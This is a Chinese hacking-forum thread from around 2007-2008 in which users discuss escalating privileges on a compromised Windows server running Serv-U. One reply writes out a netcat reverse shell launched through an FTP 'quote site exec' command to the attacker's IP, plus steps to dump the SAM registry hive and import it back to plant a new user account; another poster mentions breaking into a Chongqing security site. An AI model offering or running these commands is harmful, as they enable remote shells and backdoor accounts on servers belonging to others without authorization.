冲红灯

楼主的ser-u很显然不是系统权限了,估计不好办了

不过这位朋友说的,很想知道,能不能说一下具体的方法```

mt使用是系统权限,还是guest,user权限
引用:
引用第19楼jjzj8于2007-12-31 02:05发表的 :
有些服务器，在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户

测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器，
帖子30 精华0 积分93 阅读权限40 性别女 在线时间65 小时 注册时间2007-7-22 最后登录2008-5-15 查看个人网站
查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然

小希

引用:
引用第19楼jjzj8于2007-12-31 02:05发表的 :
有些服务器，在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户

测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器，
我试过本地建个帐户，然后导出注册表（就类似于建立隐藏帐户那种）。
然后写了批处理，想在服务器上导入注册表。
但最终还是失败了。
这位大哥提到了MT，不知道你具体做法是怎样的？
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

zczpc2000
晶莹剔透§烈日灼然

老游子

看了你这个，估计最大的可能就是SU是user启动的，那就基本木搞了，除非你有0DAY。

另外你的NC貌似也搞错了。

先在本地nc -vlp 1234(也可以是其它端口）

然后在FTP里执行quote site exec "c:\inetpub\nc.exe -e cmd.exe xxx.xxx.xxx.xxx(你的IP) 1234"

还有就是用注册表加用户：先quote site exec "regedit.exe /e 1.reg HKEY_LOCAL_MACHINE\SAM"

然后在本地regedit /s 1.reg ，在本地net user test 123456789=1234 /add

在regedit /e 1.reg 1.reg HKEY_LOCAL_MACHINE\SAM

最后在服务器上quote site exec "regedit /s 1.reg"
帖子31 精华0 积分96 阅读权限40 在线时间34 小时 注册时间2005-12-30 最后登录2008-6-28 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然

dabofeng

引用:
引用第22楼zczpc2000于2007-12-31 20:40发表的 :
看了你这个，估计最大的可能就是SU是user启动的，那就基本木搞了，除非你有0DAY。

另外你的NC貌似也搞错了。

先在本地nc -vlp 1234(也可以是其它端口）
.......
谢谢指教。
貌似SU确实是USER，虽然我把帐户弄成管理员，但是nc反弹不起作用哈。
另外，到出SAM，FTP显示执行成功，但并没有产生1.reg。

so,,我准备放弃了，，，，，，
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

doublej
晶莹剔透§烈日灼然